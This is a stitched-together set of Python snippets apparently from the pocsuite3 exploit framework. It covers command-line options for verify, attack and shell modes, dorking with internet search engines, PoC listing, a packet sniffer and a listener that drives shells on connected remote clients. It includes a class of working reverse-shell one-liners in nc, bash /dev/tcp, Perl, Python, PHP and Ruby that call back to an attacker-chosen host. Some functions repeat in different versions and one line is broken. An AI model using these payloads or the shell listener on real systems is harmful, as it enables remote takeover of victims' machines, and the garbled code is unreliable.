def __init__(self, filter): super().__init__() self.filter = "host %s" % filter self.daemon = True self.socket = None self.use_pcap = True self.is_admin = False logger.info( 'Local network adapter information, choose a network you want to ' 'capture.') message = '----- Local IP Address -----\n' ifaces = [] if WINDOWS: import ctypes from scapy.all import IFACES if ctypes.windll.shell32.IsUserAnAdmin(): self.is_admin = True for i, iface in enumerate(sorted(IFACES)): dev = IFACES[iface] ifaces.append(dev.description) message += "{0} {1} {2}\n".format(i, dev.description, dev.ip) else: if os.getuid() == 0: self.is_admin = True ifaces = get_if_list() for i, iface in enumerate(ifaces): ip = get_if_addr(iface) message += "{0} {1} {2}\n".format(i, iface, ip) data_to_stdout(message) choose = input('Choose>: ').strip() self.interface = ifaces[int(choose)] self.use_pcap = True self.stop_sniffer = Event() self.pcap = None
def show_task_result(): if conf.quiet: return if not kb.results: return if conf.mode == "shell": return results_table = PrettyTable( ["target-url", "poc-name", "poc-id", "component", "version", "status"]) results_table.align["target-url"] = "l" results_table.padding_width = 1 total_num, success_num = 0, 0 for row in kb.results: results_table.add_row([ row.target, row.poc_name, row.vul_id, row.app_name, row.app_version, row.status, ]) total_num += 1 if row.status == 'success': success_num += 1 data_to_stdout('\n{0}'.format( results_table.get_string(sortby="status", reversesort=True))) data_to_stdout("\nsuccess : {} / {}\n".format(success_num, total_num))
def command_search(self, *args, **kwargs): keyword = args[0] if not keyword: logger.warning( "Please specify search keyword. e.g. 'search wordpress'") return tb = prettytable.PrettyTable() tb.field_names = ["Index", "Path"] search_result = [] for module in self.main_modules_dirs: m = re.search(keyword, module, re.I | re.S) if m: search_result.append((module, m.group(0))) index = 0 for s, k in search_result: tb.add_row( [index, "{}\033[31m{}\033[0m{}".format(*s.partition(k))]) index = index + 1 self.last_search = [i for i, j in search_result] data_to_stdout(tb.get_string()) data_to_stdout("\n")
def command_help(self, *args, **kwargs): data_to_stdout(self.global_help) data_to_stdout("\n") if self.current_module: data_to_stdout("\n") data_to_stdout(self.module_help) data_to_stdout("\n")
def handle_listener_connection(): _ = ["list", "select", "exit", "quit", "clear"] auto_completion(AUTOCOMPLETE_TYPE.POCSUITE, commands=_) while True: cmd = None cmd = input('shell>: ').strip() if not cmd: continue elif cmd.lower() in ("?", "help"): print_cmd_help() elif cmd.lower() == "clear": clear_history() data_to_stdout("[i] history cleared\n") save_history(AUTOCOMPLETE_TYPE.POCSUITE) elif cmd.lower() in ("x", "q", "exit", "quit"): raise PocsuiteShellQuitException elif cmd == "list": list_clients() elif "select" in cmd: client = get_client(cmd) if client is not None: send_shell_commands(client) else: save_history(AUTOCOMPLETE_TYPE.POCSUITE) load_history(AUTOCOMPLETE_TYPE.POCSUITE) data_to_stdout("Command Not Found... type ? for help.")
def list_clients(): results = '' for i, client in enumerate(kb.data.clients): try: client.conn.send(str.encode('uname\n')) time.sleep(0.01) ret = client.conn.recv(2048) if ret: ret = ret.decode('utf-8', errors="ignore") system = "unknown" if "darwin" in ret.lower(): system = "Darwin" elif "linux" in ret.lower(): system = "Linux" elif "uname" in ret.lower(): system = "Windows" except Exception as ex: # If a connection fails, remove it logger.exception(ex) del kb.data.clients[i] continue results += (str(i) + " " + (desensitization(client.address[0]) if conf.ppt else str(client.address[0])) + " " + str(client.address[1]) + " ({0})".format(system) + '\n') data_to_stdout("----- Remote Clients -----" + "\n" + results)
def update(): if not conf.update_all: return success = False if not os.path.exists(os.path.join(paths.POCSUITE_ROOT_PATH, "../", ".git")): warn_msg = "not a git repository. It is recommended to clone the 'knownsec/pocsuite3' repository " warn_msg += "from GitHub (e.g. 'git clone --depth 1 {} pocsuite3')".format( GIT_REPOSITORY) logger.warn(warn_msg) if VERSION == get_latest_revision(): logger.info("already at the latest revision '{}'".format( get_revision_number())) return else: info_msg = "updating pocsuite3 to the latest development revision from the " info_msg += "GitHub repository" logger.info(info_msg) debug_msg = "pocsuite3 will try to update itself using 'git' command" logger.debug(debug_msg) data_to_stdout("\r[{0}] [INFO] update in progress ".format( time.strftime("%X"))) cwd_path = os.path.join(paths.POCSUITE_ROOT_PATH, "../") try: process = subprocess.Popen( "git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd_path.encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) poll_process(process, True) stdout, stderr = process.communicate() success = not process.returncode except (IOError, OSError) as ex: success = False stderr = str(ex) if success: logger.info("{0} the latest revision '{1}'".format( "already at" if b"Already" in stdout else "updated to", get_revision_number())) else: if "Not a git repository" in stderr: err_msg = "not a valid git repository. Please checkout the 'knownsec/pocsuite3' repository " err_msg += "from GitHub (e.g. 'git clone --depth 1 %s pocsuite3')" % GIT_REPOSITORY logger.error(err_msg) else: logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) if not success: if IS_WIN: info_msg = "for Windows platform it's recommended " info_msg += "to use a GitHub for Windows client for updating " info_msg += "purposes (http://windows.github.com/) or just " info_msg += "download the latest snapshot from " info_msg += "https://github.com/knownsec/pocsuite3/downloads" else: info_msg = "for Linux platform it's recommended " info_msg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" logger.info(info_msg)
def _show_ip(self, *args, **kwargs): ips = get_local_ip(all=True) tb = prettytable.PrettyTable(["Index", "IP"]) index = 0 for item in ips: tb.add_row([str(index), item]) index += 1 data_to_stdout("\n" + tb.get_string() + "\n")
def print_cmd_help(): msg = "----- Help Menu -----\n" msg += "command description\n" msg += "list list connected clients\n" msg += "select select which client to send command\n" msg += "quit quit shell\n" msg += "help print help information\n" data_to_stdout(msg)
def get_client(cmd): try: target = cmd.replace("select ", "") target = int(target) client = kb.data.clients[target] # Connect to the selected clients data_to_stdout("Now Connected: {0}\n".format(str(kb.data.clients[target].address[0]))) return client except Exception: data_to_stdout("Invalid Client\n") return None
def get_client(cmd): try: target = cmd.split(" ")[1] target = int(target) client = kb.data.clients[target] # Connect to the selected clients data_to_stdout("Now Connected: {0}\n".format( desensitization(client.address[0] if conf.ppt else client.address[0]))) return client except Exception: data_to_stdout("Invalid Client\n") return None
def list_clients(): results = '' for i, client in enumerate(kb.data.clients): try: client.conn.send(str.encode('pwd\n')) client.conn.recv(20480) except Exception: # If a connection fails, remove it del kb.data.clients[i] continue results += str(i) + " " + str(client.address[0]) + " " + str( client.address[1]) + '\n' data_to_stdout("----- Remote Clients -----" + "\n" + results)
def handle_listener_connection_for_console(wait_time=3, try_count=3): cmd = "select 0" client = get_client(cmd) if client is not None: f = send_shell_commands_for_console(client) if f: return if try_count > 0: time.sleep(wait_time) data_to_stdout("connect err remaining number of retries %s times\n" % (try_count)) try_count -= 1 return handle_listener_connection_for_console(wait_time=wait_time, try_count=try_count)
def _set_connect_back(): ips = get_local_ip(all=True) if ips: kb.data.local_ips = ips if conf.mode == "shell" and conf.connect_back_host is None: data_to_stdout( "[i] pocsusite is running in shell mode, you need to set connect back host:\n" ) message = '----- Local IP Address -----\n' for i, ip in enumerate(kb.data.local_ips): message += "{0} {1}\n".format(i, ip) data_to_stdout(message) while True: choose = None choose = input('Choose>: ').strip() if not choose: continue try: if choose.isdigit(): choose = int(choose) conf.connect_back_host = kb.data.local_ips[choose] data_to_stdout("you choose {0}\n".format( conf.connect_back_host)) break except Exception: data_to_stdout("wrong number, choose again\n")
def _set_connect_back(): if conf.mode == "shell" and conf.connect_back_host is None: wan_ipv4 = get_host_ip() kb.data.local_ips = get_local_ip(all=True) data_to_stdout( "[i] pocsusite is running in shell mode, you need to set connect back host:\n" ) message = '----- Local IP Address -----\n' for i, ip in enumerate(kb.data.local_ips): v = ip if conf.ppt: v = desensitization(v) if ip == wan_ipv4: v = colored(f'{v} *wan*', 'green') message += "{0} {1}\n".format(i, v) data_to_stdout(message) while True: choose = None choose = input('Choose>: ').strip() if not choose: continue try: if choose.isdigit(): choose = int(choose) conf.connect_back_host = kb.data.local_ips[choose] data_to_stdout("you choose {0}\n".format( desensitization(conf.connect_back_host) if conf. ppt else conf.connect_back_host)) break except Exception: data_to_stdout("wrong number, choose again\n")
def command_list(self, *args, **kwargs): # 展现所有可用的poc search_result = [] tb = prettytable.PrettyTable(["Index", "Path", "Name"]) index = 0 for tmp_module in self.main_modules_dirs: found = os.path.join(paths.POCSUITE_ROOT_PATH, tmp_module + ".py") with open(found, encoding='utf-8') as f: code = f.read() name = get_poc_name(code) tb.add_row([str(index), tmp_module, name]) search_result.append(tmp_module) index += 1 data_to_stdout("\n" + tb.get_string() + "\n") self.last_search = search_result
def __init__(self, filter): super().__init__() self.filter = "host %s" % filter self.daemon = True self.socket = None self.use_pcap = True self.is_admin = False logger.info( "Local network adapter information, choose a network you want to capture" ) if WINDOWS: iface = [] import ctypes if ctypes.windll.shell32.IsUserAnAdmin(): self.is_admin = True ips = get_local_ip(all=True) message = '----- Local IP Address -----\n' name = [] interface_ips = [] for iface_name in sorted(IFACES): if list(set(IFACES[iface_name].data['ips'])): if list(set(IFACES[iface_name].data['ips']))[0] in ips: name.append(IFACES[iface_name].data['name']) interface_ips.append( list(set(IFACES[iface_name].data['ips']))[0]) iface.append(IFACES[iface_name].data['description']) for i, ip in enumerate(interface_ips): message += "{0} {1} {2}\n".format(i, name[i], ip) else: if os.getuid() == 0: self.is_admin = True from pocsuite3.thirdparty.scapy.core import get_if_list, get_if_lists iface, ips = get_if_lists() message = '----- Local IP Address -----\n' for i, ip in enumerate(ips): message += "{0} {1} {2}\n".format(i, iface[i], ip) data_to_stdout(message) choose = input('Choose>: ').strip() self.interface = iface[int(choose)] self.use_pcap = conf.use_pcap self.stop_sniffer = Event() self.pcap = None
def show_task_result(): if conf.quiet: return if not kb.results: return if conf.mode == "shell": return fields = [ "target-url", "poc-name", "poc-id", "component", "version", "status" ] if kb.comparison: fields.append("source") fields.append("honey-pot") results_table = PrettyTable(fields) results_table.align["target-url"] = "l" results_table.padding_width = 1 total_num, success_num = 0, 0 for row in kb.results: data = [ row.target, row.poc_name, row.vul_id, row.app_name, row.app_version, row.status, ] if kb.comparison: source, honey = kb.comparison.getinfo(row.target) data.append(source) data.append(honey) results_table.add_row(data) total_num += 1 if row.status == 'success': success_num += 1 data_to_stdout('\n{0}'.format( results_table.get_string(sortby="status", reversesort=True))) data_to_stdout("\nsuccess : {} / {}\n".format(success_num, total_num))
def send_shell_commands(client): auto_completion(AUTOCOMPLETE_TYPE.OS, OS.LINUX) while True: cmd = None try: address = client.address[0] cmd = input("{0}>: ".format(address)) if not cmd: continue elif cmd.lower() == "clear": clear_history() data_to_stdout("[i] history cleared\n") save_history(AUTOCOMPLETE_TYPE.POCSUITE) elif cmd.lower() in ("x", "q", "exit", "quit", "bye"): break client.conn.send(str.encode(cmd + '\n')) resp = poll_cmd_execute(client) data_to_stdout(resp) except Exception as ex: logger.error(str(ex)) data_to_stdout("Connection Lost\n") break
def send_shell_commands_for_console(client): module_prompt_default_template = "\001\033[4m\002SHELL\001\033[0m\002 (\001\033[91m\002{hostname}\001\033[0m\002) > " while True: cmd = None try: address = client.address[0] cmd = input(module_prompt_default_template.format(hostname=address)) if not cmd: continue elif cmd.lower() == "clear": clear_history() data_to_stdout("[i] history cleared\n") elif cmd.lower() in ("x", "q", "exit", "quit", "bye"): break client.conn.send(str.encode(cmd + '\n')) resp = poll_cmd_execute(client) data_to_stdout(resp) except Exception as ex: logger.error(str(ex)) data_to_stdout("Connection Lost\n") break return True
def output(self): results_table = PrettyTable(["Search-engine", "Dork", "Total-data", "Success-rate", "Repetition-rate"]) results_table.align["Search-engine"] = "c" results_table.padding_width = 1 results = [] for engine, item in self._statistics().items(): dork = "" if engine in self.dork: dork = self.dork[engine] _result = [ engine, dork, item["total"], "{0:.1f}%".format(item["success"] / item["total"] * 100), "{0:.1f}%".format(item["repetition"] / item["total"] * 100) ] results.append(_result) for row in results: results_table.add_row(row) data_to_stdout('\n{0}\n'.format(results_table.get_string()))
def _show_info(self, *args, **kwargs): fields = ["name", "VulID", "version", "author", "vulDate", "createDate", "updateDate", "references", "appPowerLink", "appName", "appVersion", "vulType", "desc"] msg = "" for field in fields: value = getattr(self.current_module, field, None) if value: value = str(value).strip() # for name highlight if field == "name": value = colored(value, "green") msg = msg + "%-20s %-10s\n" % (field, value) data_to_stdout("\n") data_to_stdout(msg) data_to_stdout("\n")
def _show_pocs_modules_options(): if not conf.show_options: return for module_name, poc_class in kb.registered_pocs.items(): module_options = poc_class.options tb = prettytable.PrettyTable( ['Name', 'Current settings', 'Type', 'Description']) # add target option for name, opt in module_options.items(): value = opt.value if opt.require and value == '': value = colored('*require*', 'red') tb.add_row([name, value, opt.type, opt.description]) data_to_stdout(f'\nModule ({module_name}) options:\n') data_to_stdout(tb.get_string()) data_to_stdout('\n') exit()
def main(): """ @function Main function of pocsuite when running from command line. """ try: check_environment() set_paths(module_path()) banner() init_options(cmd_line_parser().__dict__) data_to_stdout("[*] starting at {0}\n\n".format(time.strftime("%X"))) init() try: start() except threading.ThreadError: raise except PocsuiteUserQuitException: pass except PocsuiteShellQuitException: pass except PocsuiteSystemException: pass except KeyboardInterrupt: pass except EOFError: pass except SystemExit: pass except Exception: exc_msg = traceback.format_exc() data_to_stdout(exc_msg) raise SystemExit finally: data_to_stdout("\n[*] shutting down at {0}\n\n".format( time.strftime("%X")))
def poll_cmd_execute(client, timeout=8): if has_poll(): p = select.poll() event_in_mask = select.POLLIN | select.POLLPRI event_err_mask = select.POLLERR event_closed_mask = select.POLLHUP | select.POLLNVAL event_mask = event_in_mask | event_err_mask | event_closed_mask p.register(client.conn, event_mask) count = 0 ret = '' while True: events = p.poll(timeout) if events: event = events[0][1] if event & select.POLLERR: ret = "Client Hung up\n" break ready = event & select.POLLPRI or event & select.POLLIN if not ready: ret = "execute command timeout\n" break else: ret += get_unicode(client.conn.recv(0x10000)) # ret += str(client.conn.recv(0x10000), "utf-8") else: if ret: break elif count > timeout: ret = "execute command timeout\n" break else: data_to_stdout(".") time.sleep(1) count += 1 p.unregister(client.conn) else: count = 0 ret = '' while True: ready = select.select([client.conn], [], [], 0.1) if ready[0]: ret += get_unicode(client.conn.recv(0x10000)) # ret += str(client.conn.recv(0x10000), "utf-8") else: if ret: break elif count > timeout: ret = "execute command timeout\n" else: data_to_stdout('.') time.sleep(1) count += 1 if ret and not ret.startswith('\r'): ret = "\r{0}".format(ret) if ret and not ret.endswith('\n'): ret = "{0}\n".format(ret) return ret
elif cmd.lower() == "clear": clear_history() data_to_stdout("[i] history cleared\n") save_history(AUTOCOMPLETE_TYPE.POCSUITE) elif cmd.lower() in ("x", "q", "exit", "quit"): raise PocsuiteShellQuitException elif cmd == "list":sel list_clients() elif "select" in cmd: client = get_client(cmd) if client is not None: send_shell_commands(client) else: save_history(AUTOCOMPLETE_TYPE.POCSUITE) load_history(AUTOCOMPLETE_TYPE.POCSUITE) data_to_stdout("Command Not Found... type ? for help.") class REVERSE_PAYLOAD: NC = """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f""" NC2 = """nc -e /bin/sh {0} {1}""" NC3 = """rm -f /tmp/p;mknod /tmp/p p && nc {0} {1} 0/tmp/p""" BASH = """sh -i >& /dev/tcp/{0}/{1} 0>&1""" BASH2 = """sh -i >& /dev/tcp/{0}/{1} 0>&1""" TELNET = """rm -f /tmp/p; mknod /tmp/p p && telnet {0} {1} 0/tmp/p""" PERL = """perl -e 'use Socket;$i="{0}";$p={1};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}};'""" PYTHON = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{0}",{1}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" PHP = """php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'""" RUBY = """ruby -rsocket -e'f=TCPSocket.open("{0}",{1}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'""" JAVA = """ r = Runtime.getRuntime()
def cmd_line_parser(argv=None): """ This function parses the command line parameters and arguments """ if not argv: argv = sys.argv _ = os.path.basename(argv[0]) usage = "pocsuite [options]" parser = argparse.ArgumentParser(prog='Pocsuite3', usage=usage) try: parser.add_argument("--version", dest="show_version", action="store_true", help="Show program's version number and exit") parser.add_argument("--update", dest="update_all", action="store_true", help="Update Pocsuite") parser.add_argument("-v", dest="verbose", type=int, default=1, choices=list(range(7)), help="Verbosity level: 0-6 (default 1)") # Target options target = parser.add_argument_group( 'Target', "At least one of these " "options has to be provided to define the target(s)") target.add_argument( "-u", "--url", dest="url", nargs='+', help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")") target.add_argument( "-f", "--file", dest="url_file", help="Scan multiple targets given in a textual file") target.add_argument( "-r", dest="poc", nargs='+', help="Load POC file from local or remote from seebug website") target.add_argument("-c", dest="configFile", help="Load options from a configuration INI file") # Mode options mode = parser.add_argument_group("Mode", "Pocsuite running mode options") mode.add_argument("--verify", dest="mode", default='verify', action="store_const", const='verify', help="Run poc with verify mode") mode.add_argument("--attack", dest="mode", action="store_const", const='attack', help="Run poc with attack mode") mode.add_argument("--shell", dest="mode", action="store_const", const='shell', help="Run poc with shell mode") # Requests options request = parser.add_argument_group("Request", "Network request options") request.add_argument("--cookie", dest="cookie", help="HTTP Cookie header value") request.add_argument("--host", dest="host", help="HTTP Host header value") request.add_argument("--referer", dest="referer", help="HTTP Referer header value") request.add_argument("--user-agent", dest="agent", help="HTTP User-Agent header value") request.add_argument( "--random-agent", dest="random_agent", action="store_true", default=False, help="Use randomly selected HTTP User-Agent header value") request.add_argument("--proxy", dest="proxy", help="Use a proxy to connect to the target URL") request.add_argument( "--proxy-cred", dest="proxy_cred", help="Proxy authentication credentials (name:password)") request.add_argument( "--timeout", dest="timeout", help="Seconds to wait before timeout connection (default 30)") request.add_argument("--retry", dest="retry", default=False, help="Time out retrials times.") request.add_argument("--delay", dest="delay", help="Delay between two request of one thread") request.add_argument( "--headers", dest="headers", help="Extra headers (e.g. \"key1: value1\\nkey2: value2\")") # Account options group = parser.add_argument_group( "Account", "Telnet404、Shodan、CEye、Fofa account options") group.add_argument("--login-user", dest="login_user", help="Telnet404 login user") group.add_argument("--login-pass", dest="login_pass", help="Telnet404 login password") group.add_argument("--shodan-token", dest="shodan_token", help="Shodan token") group.add_argument("--fofa-user", dest="fofa_user", help="fofa user") group.add_argument("--fofa-token", dest="fofa_token", help="fofa token") group.add_argument("--quake-token", dest="quake_token", help="quake token") group.add_argument("--censys-uid", dest="censys_uid", help="Censys uid") group.add_argument("--censys-secret", dest="censys_secret", help="Censys secret") # Modules options modules = parser.add_argument_group( "Modules", "Modules(Seebug、Zoomeye、CEye、Fofa、Quake Listener) options") modules.add_argument("--dork", dest="dork", action="store", default=None, help="Zoomeye dork used for search.") modules.add_argument("--dork-zoomeye", dest="dork_zoomeye", action="store", default=None, help="Zoomeye dork used for search.") modules.add_argument("--dork-shodan", dest="dork_shodan", action="store", default=None, help="Shodan dork used for search.") modules.add_argument("--dork-censys", dest="dork_censys", action="store", default=None, help="Censys dork used for search.") modules.add_argument("--dork-fofa", dest="dork_fofa", action="store", default=None, help="Fofa dork used for search.") modules.add_argument("--dork-quake", dest="dork_quake", action="store", default=None, help="Quake dork used for search.") modules.add_argument( "--max-page", dest="max_page", type=int, default=1, help="Max page used in ZoomEye API(10 targets/Page).") modules.add_argument( "--search-type", dest="search_type", action="store", default='host', help="search type used in ZoomEye API, web or host") modules.add_argument("--vul-keyword", dest="vul_keyword", action="store", default=None, help="Seebug keyword used for search.") modules.add_argument("--ssv-id", dest="ssvid", action="store", default=None, help="Seebug SSVID number for target PoC.") modules.add_argument( "--lhost", dest="connect_back_host", action="store", default=None, help="Connect back host for target PoC in shell mode") modules.add_argument( "--lport", dest="connect_back_port", action="store", default=None, help="Connect back port for target PoC in shell mode") modules.add_argument("--comparison", dest="comparison", help="Compare popular web search engines", action="store_true", default=False) modules.add_argument("--dork-b64", dest="dork_b64", help="Whether dork is in base64 format", action="store_true", default=False) # Optimization options optimization = parser.add_argument_group("Optimization", "Optimization options") optimization.add_argument("--plugins", dest="plugins", action="store", default=None, help="Load plugins to execute") optimization.add_argument("--pocs-path", dest="pocs_path", action="store", default=None, help="User defined poc scripts path") optimization.add_argument( "--threads", dest="threads", type=int, default=1, help="Max number of concurrent network requests (default 1)") optimization.add_argument( "--batch", dest="batch", help="Automatically choose defaut choice without asking.") optimization.add_argument("--requires", dest="check_requires", action="store_true", default=False, help="Check install_requires") optimization.add_argument( "--quiet", dest="quiet", action="store_true", default=False, help="Activate quiet mode, working without logger.") optimization.add_argument( "--ppt", dest="ppt", action="store_true", default=False, help="Hiden sensitive information when published to the network") optimization.add_argument("--pcap", dest="pcap", action="store_true", default=False, help="use scapy capture flow") optimization.add_argument( "--rule", dest="rule", action="store_true", default=False, help="export rules, default export reqeust and response") optimization.add_argument("--rule-req", dest="rule_req", action="store_true", default=False, help="only export request rule") optimization.add_argument( "--rule-filename", dest="rule_filename", action="store", default=False, help="Specify the name of the export rule file") # Diy options diy = parser.add_argument_group("Poc options", "definition options for PoC") for line in argv: if line.startswith("--"): if line[2:] not in CMD_PARSE_WHITELIST: diy.add_argument(line) args = parser.parse_args() if not any( (args.url, args.url_file, args.update_all, args.plugins, args.dork, args.dork_shodan, args.dork_fofa, args.dork_quake, args.dork_censys, args.dork_zoomeye, args.configFile, args.show_version)) and not args.rule and not args.rule_req: err_msg = "missing a mandatory option (-u, --url-file, --update). " err_msg += "Use -h for basic and -hh for advanced help\n" parser.error(err_msg) return args except SystemExit: # Protection against Windows dummy double clicking if IS_WIN: data_to_stdout("\nPress Enter to continue...") input() raise
def _show_options(self, *args, **kwargs): global_options = self.current_module.global_options module_options = self.current_module.options payload_options = self.current_module.payload_options tb2 = prettytable.PrettyTable( ["Name", "Current settings", "Type", "Descript"]) for name, opt in global_options.items(): value = opt.value if opt.require and value == "": value = colored("*require*", "red") tb2.add_row([name, value, opt.type, opt.description]) data_to_stdout("\nTarget options:\n") data_to_stdout(tb2.get_string()) data_to_stdout("\n") if module_options: tb = prettytable.PrettyTable( ["Name", "Current settings", "Type", "Descript"]) # add target option for name, opt in module_options.items(): value = opt.value if opt.require and value == "": value = colored("*require*", "red") tb.add_row([name, value, opt.type, opt.description]) data_to_stdout("\nModule options:\n") data_to_stdout(tb.get_string()) data_to_stdout("\n") # exploit payload if payload_options: tb3 = prettytable.PrettyTable( ["Name", "Current settings", "Type", "Descript"]) for name, opt in payload_options.items(): value = opt.value if opt.require and value == "": value = colored("*require*", "red") tb3.add_row([name, value, opt.type, opt.description]) data_to_stdout("\nExploit payloads(using reverse tcp):\n") data_to_stdout(tb3.get_string()) data_to_stdout("\n") data_to_stdout("\n")
def cmd_line_parser(argv=None): """ This function parses the command line parameters and arguments """ if not argv: argv = sys.argv _ = os.path.basename(argv[0]) usage = "pocsuite [options]" parser = OptionParser(usage=usage) try: parser.add_option("--version", dest="show_version", action="store_true", help="Show program's version number and exit") parser.add_option("--update", dest="update_all", action="store_true", help="Update Pocsuite") parser.add_option("-v", dest="verbose", type="int", default=1, help="Verbosity level: 0-6 (default 1)") # Target options target = OptionGroup( parser, "Target", "At least one of these " "options has to be provided to define the target(s)") target.add_option( "-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")") target.add_option("-f", "--file", dest="url_file", help="Scan multiple targets given in a textual file") target.add_option( "-r", dest="poc", help="Load POC file from local or remote from seebug website") # Mode options mode = OptionGroup(parser, "Mode", "Pocsuite running mode options") mode.add_option("--verify", dest="mode", default='verify', action="store_const", const='verify', help="Run poc with verify mode") mode.add_option("--attack", dest="mode", action="store_const", const='attack', help="Run poc with attack mode") mode.add_option("--shell", dest="mode", action="store_const", const='shell', help="Run poc with shell mode") # Requests options request = OptionGroup(parser, "Request", "Network request options") request.add_option("--cookie", dest="cookie", help="HTTP Cookie header value") request.add_option("--host", dest="host", help="HTTP Host header value") request.add_option("--referer", dest="referer", help="HTTP Referer header value") request.add_option("--user-agent", dest="agent", help="HTTP User-Agent header value") request.add_option( "--random-agent", dest="random_agent", action="store_true", default=False, help="Use randomly selected HTTP User-Agent header value") request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL") request.add_option( "--proxy-cred", dest="proxy_cred", help="Proxy authentication credentials (name:password)") request.add_option( "--timeout", dest="timeout", help="Seconds to wait before timeout connection (default 30)") request.add_option("--retry", dest="retry", default=False, help="Time out retrials times.") request.add_option("--delay", dest="delay", help="Delay between two request of one thread") request.add_option( "--headers", dest="headers", help="Extra headers (e.g. \"key1: value1\\nkey2: value2\")") # Account options account = OptionGroup(parser, "Account", "Telnet404 account options") account.add_option("--login-user", dest="login_user", help="Telnet404 login user") account.add_option("--login-pass", dest="login_pass", help="Telnet404 login password") # Modules options modules = OptionGroup(parser, "Modules", "Modules(Seebug Zoomeye CEye Listener) options") modules.add_option("--dork", dest="dork", action="store", default=None, help="Zoomeye dork used for search.") modules.add_option( "--max-page", dest="max_page", type=int, default=1, help="Max page used in ZoomEye API(10 targets/Page).") modules.add_option("--search-type", dest="search_type", action="store", default='host', help="search type used in ZoomEye API, web or host") modules.add_option("--vul-keyword", dest="vul_keyword", action="store", default=None, help="Seebug keyword used for search.") modules.add_option("--ssv-id", dest="ssvid", action="store", default=None, help="Seebug SSVID number for target PoC.") modules.add_option( "--lhost", dest="connect_back_host", action="store", default=None, help="Connect back host for target PoC in shell mode") modules.add_option( "--lport", dest="connect_back_port", action="store", default=None, help="Connect back port for target PoC in shell mode") # Optimization options optimization = OptionGroup(parser, "Optimization", "Optimization options") optimization.add_option("--plugins", dest="plugins", action="store", default=None, help="Load plugins to execute") optimization.add_option("--pocs-path", dest="pocs_path", action="store", default=None, help="User defined poc scripts path") optimization.add_option( "--threads", dest="threads", type=int, default=1, help="Max number of concurrent network requests (default 1)") optimization.add_option( "--batch", dest="batch", help="Automatically choose defaut choice without asking.") optimization.add_option("--requires", dest="check_requires", action="store_true", default=False, help="Check install_requires") optimization.add_option( "--quiet", dest="quiet", action="store_true", default=False, help="Activate quiet mode, working without logger.") # Diy options diy_options = OptionGroup(parser, "Poc options", "definition options for PoC") for line in argv: if line.startswith("--"): if line[2:] not in CMD_PARSE_WHITELIST: diy_options.add_option(line) parser.add_option_group(target) parser.add_option_group(mode) parser.add_option_group(request) parser.add_option_group(account) parser.add_option_group(modules) parser.add_option_group(optimization) parser.add_option_group(diy_options) (args, _) = parser.parse_args(argv) if not any((args.url, args.url_file, args.update_all, args.plugins, args.dork)): err_msg = "missing a mandatory option (-u, --url-file, --update). " err_msg += "Use -h for basic and -hh for advanced help\n" parser.error(err_msg) return args except (OptionError, TypeError) as e: parser.error(e) except SystemExit: # Protection against Windows dummy double clicking if IS_WIN: data_to_stdout("\nPress Enter to continue...") input() raise debug_msg = "parsing command line" logger.debug(debug_msg)